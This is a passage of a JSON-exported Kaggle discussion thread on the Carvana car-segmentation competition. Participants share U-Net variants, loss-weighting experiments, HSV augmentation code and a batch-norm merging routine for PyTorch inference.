      "rawMarkdown": "it seems that there are quite some work that deal with full resolution segmentation. Also my current unet use stacked 3x3 filters (like vgg-16). Here are some papers that uses residual block, etc to repalce it. They claimed better accuracy and efficiency.\n\n\"Efficient ConvNet for Real-time Semantic Segmentation\"- Eduardo Romera1, Jose´ M. A´ lvarez2, Luis M. Bergasa1 and Roberto Arroyo\n\n\"LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation\" - Abhishek Chaurasia\n\n\" Not All Pixels Are Equal: Difficulty-Aware Semantic Segmentation via Deep Layer Cascade\" - Xiaoxiao Li\n\n\"ICNet for Real-Time Semantic Segmentation on High-Resolution Images\"- Hengshuang Zhao1\n\n\"Improving Fully Convolution Network for Semantic Segmentation\" - Bing Shuai\n\n\"Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\" - Tobias Pohlen\n\n\"The One Hundred Layers Tiramisu: Fully Convolutional DenseNets for Semantic Segmentation\" - Simon J´egou1\n\n\"ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation\" - Adam Paszke",
      "votes": null
    },
    {
      "id": "210997",
      "postDate": "08/07/2017 19:20:36",
      "content": "<p>deleted comment - I was wrong</p>",
      "rawMarkdown": "deleted comment - I was wrong",
      "votes": null
    },
    {
      "id": "211110",
      "postDate": "08/08/2017 03:38:52",
      "content": "<p>Heng et al, Does anyone have success with CRF as post-processing?</p>\n\n<p>Original paper on Gaussian CRF: \n<a href=\"https://arxiv.org/abs/1210.5644\">https://arxiv.org/abs/1210.5644</a></p>",
      "rawMarkdown": "Heng et al, Does anyone have success with CRF as post-processing?\n\nOriginal paper on Gaussian CRF: \nhttps://arxiv.org/abs/1210.5644",
      "votes": null
    },
    {
      "id": "211115",
      "postDate": "08/08/2017 04:12:25",
      "content": "<p>This is excellent!!</p>",
      "rawMarkdown": "This is excellent!!",
      "votes": null
    },
    {
      "id": "211268",
      "postDate": "08/08/2017 13:39:06",
      "content": "<p>Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes</p>\n\n<p><a href=\"https://www.youtube.com/watch?v=aXdigiSDIak\">https://www.youtube.com/watch?v=aXdigiSDIak</a></p>\n\n<p><a href=\"https://github.com/TobyPDE/FRRN\">https://github.com/TobyPDE/FRRN</a></p>",
      "rawMarkdown": "Full-Resolution Residual Networks for Semantic Segmentation in Street Scenes\n\nhttps://www.youtube.com/watch?v=aXdigiSDIak\n\nhttps://github.com/TobyPDE/FRRN",
      "votes": null
    },
    {
      "id": "211358",
      "postDate": "08/08/2017 18:08:32",
      "content": "<p>here is another benchmark to compare different methods:</p>\n\n<p><a href=\"https://www.cityscapes-dataset.com/benchmarks/\">https://www.cityscapes-dataset.com/benchmarks/</a></p>",
      "rawMarkdown": "here is another benchmark to compare different methods:\n\nhttps://www.cityscapes-dataset.com/benchmarks/",
      "votes": null
    },
    {
      "id": "211425",
      "postDate": "08/08/2017 23:08:26",
      "content": "<p>Did you give it a try? </p>",
      "rawMarkdown": "Did you give it a try?",
      "votes": null
    },
    {
      "id": "211618",
      "postDate": "08/09/2017 15:01:01",
      "content": "<p>Hi Heng!\nThanks for your kernel.\nBTW I see you redefined forward pass, but I don't see any redefinition of backward.\nHave you done it?\nIf not - why? do you think it's good idea to have different backward and forward ways?</p>",
      "rawMarkdown": "Hi Heng!\nThanks for your kernel.\nBTW I see you redefined forward pass, but I don't see any redefinition of backward.\nHave you done it?\nIf not - why? do you think it's good idea to have different backward and forward ways?",
      "votes": null
    },
    {
      "id": "211689",
      "postDate": "08/09/2017 18:23:03",
      "content": "<p>I got the error said:</p>\n\n<p>RuntimeError: cuda runtime error (46) : all CUDA-capable devices are busy or unavailable at pytorch/torch/lib/THC/generic/THCStorage.cu:66</p>\n\n<p>Could someone help me?</p>",
      "rawMarkdown": "I got the error said:\n\nRuntimeError: cuda runtime error (46) : all CUDA-capable devices are busy or unavailable at pytorch/torch/lib/THC/generic/THCStorage.cu:66\n\nCould someone help me?",
      "votes": null
    },
    {
      "id": "211697",
      "postDate": "08/09/2017 18:40:43",
      "content": "<p>Try restarting the machine</p>",
      "rawMarkdown": "Try restarting the machine",
      "votes": null
    },
    {
      "id": "211773",
      "postDate": "08/09/2017 22:14:25",
      "content": "<p>I'm not Heng, but if you don't mind I will answer your question:\nIn pytorch there is no need to define a backward path explicitly if using the autograd package. The path is generated implicitly from the forward path and stored in the autograd-variables. Therefore the backward path should be 'the reverse forward path' implicitly. </p>",
      "rawMarkdown": "I'm not Heng, but if you don't mind I will answer your question:\nIn pytorch there is no need to define a backward path explicitly if using the autograd package. The path is generated implicitly from the forward path and stored in the autograd-variables. Therefore the backward path should be 'the reverse forward path' implicitly.",
      "votes": null
    },
    {
      "id": "211808",
      "postDate": "08/09/2017 23:42:11",
      "content": "<p>It's university cluster so I cannot control the machine</p>",
      "rawMarkdown": "It's university cluster so I cannot control the machine",
      "votes": null
    },
    {
      "id": "211907",
      "postDate": "08/10/2017 07:39:50",
      "content": "<p>Did you set the 'CUDA_VISIBLE_DEVICES' Variable? </p>",
      "rawMarkdown": "Did you set the 'CUDA_VISIBLE_DEVICES' Variable?",
      "votes": null
    },
    {
      "id": "212248",
      "postDate": "08/11/2017 03:43:06",
      "content": "<p>another pytorch segmentation open source:</p>\n\n<p><a href=\"https://github.com/ycszen/pytorch-ss\">https://github.com/ycszen/pytorch-ss</a></p>",
      "rawMarkdown": "another pytorch segmentation open source:\n\nhttps://github.com/ycszen/pytorch-ss",
      "votes": null
    },
    {
      "id": "212369",
      "postDate": "08/11/2017 13:35:06",
      "content": "<p>experiments for weighing pixels at the boundary. see attachment pictures.</p>\n\n<p>without  weighing:  </p>\n\n<p>train=0.9934, validate=0.9940, LB=0.991</p>\n\n<p>with weighing:  </p>\n\n<p>train=0.9942, validate=0.9945, LB=0.991</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/212369/7044/weighted_dice_1.png\" alt=\"enter image description here\" title=\"\">\n  <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/212369/7045/weighted_dice_2.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "experiments for weighing pixels at the boundary. see attachment pictures.\n\nwithout  weighing:  \n\ntrain=0.9934, validate=0.9940, LB=0.991\n\nwith weighing:  \n\ntrain=0.9942, validate=0.9945, LB=0.991\n\n  ![enter image description here][1]\n  ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/212369/7044/weighted_dice_1.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/212369/7045/weighted_dice_2.png",
      "votes": null
    },
    {
      "id": "212412",
      "postDate": "08/11/2017 15:40:47",
      "content": "<p>data augmentation</p>\n\n<p><a href=\"http://ee.sharif.edu/~shayan_f/fgcc/index.html\">http://ee.sharif.edu/~shayan_f/fgcc/index.html</a></p>\n\n<p><img src=\"http://ee.sharif.edu/~shayan_f/fgcc/imgs/color1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "data augmentation\n\nhttp://ee.sharif.edu/~shayan_f/fgcc/index.html\n\n ![enter image description here][1]\n\n\n  [1]: http://ee.sharif.edu/~shayan_f/fgcc/imgs/color1.png",
      "votes": null
    },
    {
      "id": "212703",
      "postDate": "08/12/2017 12:32:45",
      "content": "<p>I'm testing a Hue/Saturation/Value augmentation. Looks promising so far, will update with results soon hopefully. My concern is that most cars in train/test sets are black, white or shade of gray and the hue/saturation adjustments don't have much of an effect there.</p>\n\n<p><img src=\"https://image.prntscr.com/image/R2F_OexrROmTMgUloNmeGQ.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "I'm testing a Hue/Saturation/Value augmentation. Looks promising so far, will update with results soon hopefully. My concern is that most cars in train/test sets are black, white or shade of gray and the hue/saturation adjustments don't have much of an effect there.\n\n![enter image description here][1]\n\n\n  [1]: https://image.prntscr.com/image/R2F_OexrROmTMgUloNmeGQ.png",
      "votes": null
    },
    {
      "id": "212895",
      "postDate": "08/13/2017 01:36:17",
      "content": "<p>smart post precocessing!\nThe car is symmetrical. this can be use to correct segmentation error. e.g. in a frontal car, if missing segementation occurs at one side, it can be easily detected. some reasoning goes for car turned at 30 degree left and right.</p>\n\n<p>better still, try a deep CNN to detect and correct such error, or incorperate such symmtrical information in the network</p>",
      "rawMarkdown": "smart post precocessing!\nThe car is symmetrical. this can be use to correct segmentation error. e.g. in a frontal car, if missing segementation occurs at one side, it can be easily detected. some reasoning goes for car turned at 30 degree left and right.\n\nbetter still, try a deep CNN to detect and correct such error, or incorperate such symmtrical information in the network",
      "votes": null
    },
    {
      "id": "213215",
      "postDate": "08/14/2017 04:31:38",
      "content": "<p>@Bruno G. do Amaral</p>\n\n<p>This cvpr 2017 oral paper has some ideas similar to yours:</p>\n\n<p><a href=\"https://sites.google.com/view/deepimagematting\">https://sites.google.com/view/deepimagematting</a></p>\n\n<p>\"Deep Image Matting\" - Ning Xu, CVPR 2017</p>\n\n<p>The input to the second stage of our network is the concatenation of an image patch and its alpha prediction from the first stage (scaled between 0 and\n255), resulting in a 4-channel input. The output is the corresponding\nground truth alpha matte. The network is a fully convolutional network which includes 4 convolutional layers. Each of the first 3 convolutional layers is followed by a non-linear “ReLU” layer. There are no downsampling layers since we want to keep very subtle structures missed in the first stage.</p>",
      "rawMarkdown": "Bruno G. do Amaral\n\nThis cvpr 2017 oral paper has some ideas similar to yours:\n\nhttps://sites.google.com/view/deepimagematting\n\n\"Deep Image Matting\" - Ning Xu, CVPR 2017\n\nThe input to the second stage of our network is the concatenation of an image patch and its alpha prediction from the first stage (scaled between 0 and\n255), resulting in a 4-channel input. The output is the corresponding\nground truth alpha matte. The network is a fully convolutional network which includes 4 convolutional layers. Each of the first 3 convolutional layers is followed by a non-linear “ReLU” layer. There are no downsampling layers since we want to keep very subtle structures missed in the first stage.",
      "votes": null
    },
    {
      "id": "213279",
      "postDate": "08/14/2017 09:53:00",
      "content": "<p>I trained a model on 1024x1024 images, with batch size 1. I'm getting these crazy artifacts in some images, resulting in a lower than expected LB score. I'm not sure if this could be related to the small batch size. Or should I be looking for errors in my upscaling methods? Did anyone encounter similar artifacts? For most images, the predictions are fine, so that the public LB score is 0.965. </p>\n\n<p><img src=\"https://i.imgur.com/hH3AW8K.png\" alt=\"example\" title=\"\"></p>",
      "rawMarkdown": "I trained a model on 1024x1024 images, with batch size 1. I'm getting these crazy artifacts in some images, resulting in a lower than expected LB score. I'm not sure if this could be related to the small batch size. Or should I be looking for errors in my upscaling methods? Did anyone encounter similar artifacts? For most images, the predictions are fine, so that the public LB score is 0.965. \n\n![example][1]\n\n\n  [1]: https://i.imgur.com/hH3AW8K.png",
      "votes": null
    },
    {
      "id": "213331",
      "postDate": "08/14/2017 14:14:35",
      "content": "<p>TTA (test time augmentation) on validation set. CNN model is 1024x1024 input</p>\n\n<p>if performed on the test set (100064 images), each augmentation is going to take 2 hr. Hence the cost is roughly 12 hr for 0.000035 gain in LB!</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/213331/7089/augment.png\" alt=\"enter image description here\" title=\"\"></p>",
      "rawMarkdown": "TTA (test time augmentation) on validation set. CNN model is 1024x1024 input\n\nif performed on the test set (100064 images), each augmentation is going to take 2 hr. Hence the cost is roughly 12 hr for 0.000035 gain in LB!\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/213331/7089/augment.png",
      "votes": null
    },
    {
      "id": "213506",
      "postDate": "08/14/2017 23:38:49",
      "content": "<p>I didn't change that, I suppose to have 1 K80 GPU available</p>",
      "rawMarkdown": "I didn't change that, I suppose to have 1 K80 GPU available",
      "votes": null
    },
    {
      "id": "213705",
      "postDate": "08/15/2017 04:56:04",
      "content": "<p>you hue augmentation looks good. do you have a code for that?</p>",
      "rawMarkdown": "you hue augmentation looks good. do you have a code for that?",
      "votes": null
    },
    {
      "id": "213713",
      "postDate": "08/15/2017 05:17:07",
      "content": "<pre><code>def randomHueSaturationValue(image, hue_shift_limit=(-180, 180),\n                             sat_shift_limit=(-255, 255),\n                             val_shift_limit=(-255, 255), u=0.5):\n    if np.random.random() &lt; u:\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n        h, s, v = cv2.split(image)\n        hue_shift = np.random.uniform(hue_shift_limit[0], hue_shift_limit[1])\n        h = cv2.add(h, hue_shift)\n        sat_shift = np.random.uniform(sat_shift_limit[0], sat_shift_limit[1])\n        s = cv2.add(s, sat_shift)\n        val_shift = np.random.uniform(val_shift_limit[0], val_shift_limit[1])\n        v = cv2.add(v, val_shift)\n        image = cv2.merge((h, s, v))\n        image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n\n    return image\n\nimg = randomHueSaturationValue(img,\n                               hue_shift_limit=(-50, 50),\n                               sat_shift_limit=(-5, 5),\n                               val_shift_limit=(-15, 15))\n</code></pre>",
      "rawMarkdown": "def randomHueSaturationValue(image, hue_shift_limit=(-180, 180),\n                                 sat_shift_limit=(-255, 255),\n                                 val_shift_limit=(-255, 255), u=0.5):\n        if np.random.random() &lt; u:\n            image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n            h, s, v = cv2.split(image)\n            hue_shift = np.random.uniform(hue_shift_limit[0], hue_shift_limit[1])\n            h = cv2.add(h, hue_shift)\n            sat_shift = np.random.uniform(sat_shift_limit[0], sat_shift_limit[1])\n            s = cv2.add(s, sat_shift)\n            val_shift = np.random.uniform(val_shift_limit[0], val_shift_limit[1])\n            v = cv2.add(v, val_shift)\n            image = cv2.merge((h, s, v))\n            image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n\n        return image\n\n    img = randomHueSaturationValue(img,\n                                   hue_shift_limit=(-50, 50),\n                                   sat_shift_limit=(-5, 5),\n                                   val_shift_limit=(-15, 15))",
      "votes": null
    },
    {
      "id": "213727",
      "postDate": "08/15/2017 05:54:35",
      "content": "<p>thanks!</p>",
      "rawMarkdown": "thanks!",
      "votes": null
    },
    {
      "id": "215233",
      "postDate": "08/20/2017 16:37:09",
      "content": "<p>code for merging removing BN in inference, by merging into CONV.\nI have verify that conv-bn-relu preduced the same results as merged_conv-relu. It is about 10% faster.</p>\n\n<p>In addition, fp16 works and produce same results (about 0.00001 numerical error difference). It can increase inference batch size by about 40%.</p>\n\n<p>In pytorch you just have to use:</p>\n\n<p>net.cuda().half()</p>\n\n<p>Variable(images,volatile=True).cuda().half()</p>\n\n<pre><code>  class ConvBnRelu2d(nn.Module):\n      def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, dilation=1, stride=1, groups=1, is_bn=True, is_relu=True):\n          super(ConvBnRelu2d, self).__init__()\n          self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, stride=stride, dilation=dilation, groups=groups, bias=False)\n          self.bn   = nn.BatchNorm2d(out_channels, eps=BN_EPS)\n          self.relu = nn.ReLU(inplace=True)\n          if is_bn   is False: self.bn  =None\n          if is_relu is False: self.relu=None\n\n\n      def forward(self,x):\n          x = self.conv(x)\n          if self.bn   is not None: x = self.bn(x)\n          if self.relu is not None: x = self.relu(x)\n          return x\n\n\n      def merge_bn(self):\n          assert(self.conv.bias==None)\n          conv_weight     = self.conv.weight.data\n          bn_weight       = self.bn.weight.data\n          bn_bias         = self.bn.bias.data\n          bn_running_mean = self.bn.running_mean\n          bn_running_var  = self.bn.running_var\n          bn_eps          = self.bn.eps\n\n          #https://github.com/sanghoon/pva-faster-rcnn/issues/5\n          #https://github.com/sanghoon/pva-faster-rcnn/commit/39570aab8c6513f0e76e5ab5dba8dfbf63e9c68c\n\n          N,C,KH,KW = conv_weight.size()\n          std = 1/(torch.sqrt(bn_running_var+bn_eps))\n          std_bn_weight =(std*bn_weight).repeat(C*KH*KW,1).t().contiguous().view(N,C,KH,KW )\n          conv_weight_hat = std_bn_weight*conv_weight\n          conv_bias_hat   = (bn_bias - bn_weight*std*bn_running_mean)\n\n          self.bn   = None\n          self.conv = nn.Conv2d(in_channels=self.conv.in_channels, out_channels=self.conv.out_channels, kernel_size=self.conv.kernel_size,\n                                padding=self.conv.padding, stride=self.conv.stride, dilation=self.conv.dilation, groups=self.conv.groups,\n                                bias=True)\n          self.conv.weight.data = conv_weight_hat #fill in\n          self.conv.bias.data   = conv_bias_hat\n</code></pre>",
      "rawMarkdown": "code for merging removing BN in inference, by merging into CONV.\nI have verify that conv-bn-relu preduced the same results as merged_conv-relu. It is about 10% faster.\n\nIn addition, fp16 works and produce same results (about 0.00001 numerical error difference). It can increase inference batch size by about 40%.\n\nIn pytorch you just have to use:\n\nnet.cuda().half()\n\nVariable(images,volatile=True).cuda().half()\n\n\n      class ConvBnRelu2d(nn.Module):\n          def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, dilation=1, stride=1, groups=1, is_bn=True, is_relu=True):\n              super(ConvBnRelu2d, self).__init__()\n              self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, stride=stride, dilation=dilation, groups=groups, bias=False)\n              self.bn   = nn.BatchNorm2d(out_channels, eps=BN_EPS)\n              self.relu = nn.ReLU(inplace=True)\n              if is_bn   is False: self.bn  =None\n              if is_relu is False: self.relu=None\n      \n      \n          def forward(self,x):\n              x = self.conv(x)\n              if self.bn   is not None: x = self.bn(x)\n              if self.relu is not None: x = self.relu(x)\n              return x\n      \n      \n          def merge_bn(self):\n              assert(self.conv.bias==None)\n              conv_weight     = self.conv.weight.data\n              bn_weight       = self.bn.weight.data\n              bn_bias         = self.bn.bias.data\n              bn_running_mean = self.bn.running_mean\n              bn_running_var  = self.bn.running_var\n              bn_eps          = self.bn.eps\n      \n              #https://github.com/sanghoon/pva-faster-rcnn/issues/5\n              #https://github.com/sanghoon/pva-faster-rcnn/commit/39570aab8c6513f0e76e5ab5dba8dfbf63e9c68c\n      \n              N,C,KH,KW = conv_weight.size()\n              std = 1/(torch.sqrt(bn_running_var+bn_eps))\n              std_bn_weight =(std*bn_weight).repeat(C*KH*KW,1).t().contiguous().view(N,C,KH,KW )\n              conv_weight_hat = std_bn_weight*conv_weight\n              conv_bias_hat   = (bn_bias - bn_weight*std*bn_running_mean)\n      \n              self.bn   = None\n              self.conv = nn.Conv2d(in_channels=self.conv.in_channels, out_channels=self.conv.out_channels, kernel_size=self.conv.kernel_size,\n                                    padding=self.conv.padding, stride=self.conv.stride, dilation=self.conv.dilation, groups=self.conv.groups,\n                                    bias=True)\n              self.conv.weight.data = conv_weight_hat #fill in\n              self.conv.bias.data   = conv_bias_hat",
      "votes": null
    },
    {
      "id": "215665",
      "postDate": "08/22/2017 15:16:23",
      "content": "<p>I'm wondering if your weighted dice loss only weights the positive class. Because <code>intersection = m1 * m2</code>, the intersection will be equal to zero wherever the mask (= true label) is zero. Hence, you end up doing <code>w2 * 0</code> for the negative class. In my mind you're ignoring the weighting of the negative class here.</p>\n\n<p>Please tell me if I'm missing something.</p>",
      "rawMarkdown": "I'm wondering if your weighted dice loss only weights the positive class. Because `intersection = m1 * m2`, the intersection will be equal to zero wherever the mask (= true label) is zero. Hence, you end up doing `w2 * 0` for the negative class. In my mind you're ignoring the weighting of the negative class here.\n\nPlease tell me if I'm missing something.",
      "votes": null
    },
    {
      "id": "216022",
      "postDate": "08/24/2017 02:07:32",
      "content": "<p>Thank you for sharing! It helps me a lot.</p>\n\n<p>Have you  tried PSPNet in your code? I want to know how the model performs in the carvana dataset.</p>",
      "rawMarkdown": "Thank you for sharing! It helps me a lot.\n\nHave you  tried PSPNet in your code? I want to know how the model performs in the carvana dataset.",
      "votes": null
    },
    {
      "id": "216075",
      "postDate": "08/24/2017 07:53:15",
      "content": "<p>I've tried pspnet - it was performing really bad.. </p>",
      "rawMarkdown": "I've tried pspnet - it was performing really bad..",
      "votes": null
    },
    {
      "id": "216158",
      "postDate": "08/24/2017 15:14:17",
      "content": "<p>Sad... I intended to try ensemble PSPNet with other model...</p>\n\n<p>I appreciate hearing that :)</p>",
      "rawMarkdown": "Sad... I intended to try ensemble PSPNet with other model...\n\nI appreciate hearing that :)",
      "votes": null
    },
    {
      "id": "216381",
      "postDate": "08/25/2017 14:09:27",
      "content": "<p>@Heng, what IDE do you use?</p>",
      "rawMarkdown": "Heng, what IDE do you use?",
      "votes": null
    },
    {
      "id": "216382",
      "postDate": "08/25/2017 14:10:23",
      "content": "<p>pycharm</p>",
      "rawMarkdown": "pycharm",
      "votes": null
    },
    {
      "id": "216500",
      "postDate": "08/26/2017 03:03:00",
      "content": "<p>I implemented your weighted_bce_loss and tested it, but the returned negative large number. (e.g. dice_score : around 0.98, weighted_bce_loss : -600~)</p>\n\n<p>Is it OK?</p>",
      "rawMarkdown": "I implemented your weighted_bce_loss and tested it, but the returned negative large number. (e.g. dice_score : around 0.98, weighted_bce_loss : -600~)\n\nIs it OK?",
      "votes": null
    },
    {
      "id": "216548",
      "postDate": "08/26/2017 15:07:53",
      "content": "<p>Hi @Heng, thanks for your sharing. I got useful knowledge from them. Since I am a new CVer,  I am not familiar with CV algorithms. I used dilation to determine which pixel to be weighed. Is it feasible? Looking forward to your reply.</p>",
      "rawMarkdown": "Hi @Heng, thanks for your sharing. I got useful knowledge from them. Since I am a new CVer,  I am not familiar with CV algorithms. I used dilation to determine which pixel to be weighed. Is it feasible? Looking forward to your reply.",
      "votes": null
    },
    {
      "id": "216554",
      "postDate": "08/26/2017 16:10:52",
      "content": "<p>@lyakaap</p>\n\n<p>loss can not be negative.  I am not sure why this error happens at your side.</p>\n\n<p>.</p>\n\n<p>@malcolm</p>\n\n<p>i think it is ok. just do experiments with and without weighing and the results will show if it works.</p>",
      "rawMarkdown": "lyakaap\n\nloss can not be negative.  I am not sure why this error happens at your side.\n\n.\n\n@malcolm\n\ni think it is ok. just do experiments with and without weighing and the results will show if it works.",
      "votes": null
    },
    {
      "id": "216639",
      "postDate": "08/27/2017 04:42:30",
      "content": "<p>I also thought it's incorrect that loss would be negative, but contrast  intuition, still it worked properly.\nOn the contrary, I tried to flip the sign of function output. The result is poor and obviously incorrect.</p>\n\n<p>Thank you for answering. I will review my implementation and recalculate bce_loss formula.</p>",
      "rawMarkdown": "I also thought it's incorrect that loss would be negative, but contrast  intuition, still it worked properly.\nOn the contrary, I tried to flip the sign of function output. The result is poor and obviously incorrect.\n\nThank you for answering. I will review my implementation and recalculate bce_loss formula.",
      "votes": null
    },
    {
      "id": "216783",
      "postDate": "08/28/2017 05:17:27",
      "content": "",
      "rawMarkdown": "",
      "votes": null
    },
    {
      "id": "218192",
      "postDate": "09/02/2017 21:07:51",
      "content": "<p>@Heng, which image input size did you use ?</p>",
      "rawMarkdown": "Heng, which image input size did you use ?",
      "votes": null
    },
    {
      "id": "218603",
      "postDate": "09/05/2017 05:15:28",
      "content": "<p>some pytorch addon:</p>\n\n<ul>\n<li><p>dense-CRF: <a href=\"https://github.com/milesial/Pytorch-UNet\">https://github.com/milesial/Pytorch-UNet</a></p></li>\n<li><p>ReduceLROnPlateau:  <a href=\"https://github.com/EKami/carvana-challenge\">https://github.com/EKami/carvana-challenge</a></p></li>\n<li><p>inception/densenet block in unet: <a href=\"https://github.com/Hsuxu/carvana-pytorch-uNet\">https://github.com/Hsuxu/carvana-pytorch-uNet</a></p></li>\n</ul>\n\n<p>for more see: <a href=\"https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=\">https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=</a></p>",
      "rawMarkdown": "some pytorch addon:\n\n -  dense-CRF: https://github.com/milesial/Pytorch-UNet\n\n -  ReduceLROnPlateau:  https://github.com/EKami/carvana-challenge\n\n - inception/densenet block in unet: https://github.com/Hsuxu/carvana-pytorch-uNet\n\nfor more see: https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=",
      "votes": null
    },
    {
      "id": "221167",
      "postDate": "09/14/2017 11:18:49",
      "content": "<p>Example of dilated Unet</p>\n\n<p><a href=\"https://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730\">https://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730</a></p>",
      "rawMarkdown": "Example of dilated Unet\n\nhttps://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730",
      "votes": null
    },
    {
      "id": "221201",
      "postDate": "09/14/2017 13:38:25",
      "content": "<p>Great thread, I am also using PyTorch, Just uploaded my tutorial here:\n<a href=\"https://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification\">https://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification</a></p>",
      "rawMarkdown": "Great thread, I am also using PyTorch, Just uploaded my tutorial here:\nhttps://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification",
      "votes": null
    },
    {
      "id": "221385",
      "postDate": "09/15/2017 03:22:29",
      "content": "<p>It seemed that the dilated convolution layer lower the loss of feature information comparing to downsampling/unsampling layer. But it requires more parameters, so we have to reduce the input size or the depth of the net to adapt to our memory. Did it count?</p>",
      "rawMarkdown": "It seemed that the dilated convolution layer lower the loss of feature information comparing to downsampling/unsampling layer. But it requires more parameters, so we have to reduce the input size or the depth of the net to adapt to our memory. Did it count?",
      "votes": null
    },
    {
      "id": "222606",
      "postDate": "09/19/2017 11:54:03",
      "content": "<p>what is split_file? thanks</p>\n\n<p>P.S. is going through all py to find how to generate it, thx a lot if you can give hint.</p>",
      "rawMarkdown": "what is split_file? thanks\n\nP.S. is going through all py to find how to generate it, thx a lot if you can give hint.",
      "votes": null
    },
    {
      "id": "222649",
      "postDate": "09/19/2017 15:33:51",
      "content": "<p>list of training/validation images. i think you can find it in one of the version 07-30. But my software changes. it would be easier for you to read the code and check the format of the file for later versions.</p>",
      "rawMarkdown": "list of training/validation images. i think you can find it in one of the version 07-30. But my software changes. it would be easier for you to read the code and check the format of the file for later versions.",
      "votes": null
    },
    {
      "id": "2869307",
      "postDate": "06/13/2024 02:39:51",
      "content": "<p>(<a href=\"https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\" target=\"_blank\">https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U</a>) Hello, I am a cv novice and want to learn the implementation of your model. The link you shared cannot be opened, could you please share it again?</p>",
      "rawMarkdown": "(https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U) Hello, I am a cv novice and want to learn the implementation of your model. The link you shared cannot be opened, could you please share it again?",
      "votes": null
    }
  ],
  "comments": [
    {
      "id": 2869307,
      "author_name": "giserli",
      "author_url": "",
      "post_date": "06/13/2024 02:39:51",
      "content": "<p>(<a href=\"https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\" target=\"_blank\">https://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U</a>) Hello, I am a cv novice and want to learn the implementation of your model. The link you shared cannot be opened, could you please share it again?</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208226,
      "author_name": "",
      "author_url": "",
      "post_date": "07/29/2017 04:11:11",
      "content": "<p>Thank you so much.</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 208227,
      "author_name": "cpruce",
      "author_url": "",
      "post_date": "07/29/2017 04:15:06",
      "content": "<p>Have you taken a look at </p>\n\n<p><a href=\"https://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras\">https://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras</a>\n<a href=\"https://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799\">https://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799</a>\n<a href=\"http://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation\">http://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation</a>\n<a href=\"https://github.com/nicolov/segmentation_keras\">https://github.com/nicolov/segmentation_keras</a></p>\n\n<p>and particularly <a href=\"https://github.com/jocicmarko/ultrasound-nerve-segmentation\">https://github.com/jocicmarko/ultrasound-nerve-segmentation</a>?</p>\n\n<p>Heng, can't thank you enough for your activity on Kaggle. I've learned a bunch from you. Hope you win this one!</p>",
      "votes": null,
      "replies": [
        {
          "id": 208854,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/31/2017 09:18:21",
          "content": "<p>thank you for the link, in particular,  \"jocicmarko/ultrasound-nerve-segmentation\" unet structure helps!</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208231,
      "author_name": "",
      "author_url": "",
      "post_date": "07/29/2017 04:43:29",
      "content": "<p>Thanks for your sharing,and can I ask how much time do you cost when you generate a submit or predict? I'm also using pytorch and I generate a predict in the test set may cost 2~3 hours,it is too slow.</p>",
      "votes": null,
      "replies": [
        {
          "id": 208235,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "07/29/2017 05:24:04",
          "content": "<p>you can check this post:\n<a href=\"https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203\">https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203</a></p>\n\n<p>It takes about 20 min to predict the masks using CNN, an another 20 min the make csv file.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 208247,
          "author_name": "",
          "author_url": "",
          "post_date": "07/29/2017 05:55:07",
          "content": "<p>Oh,Thanks,that's very  effective~~</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 208326,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "07/29/2017 12:31:04",
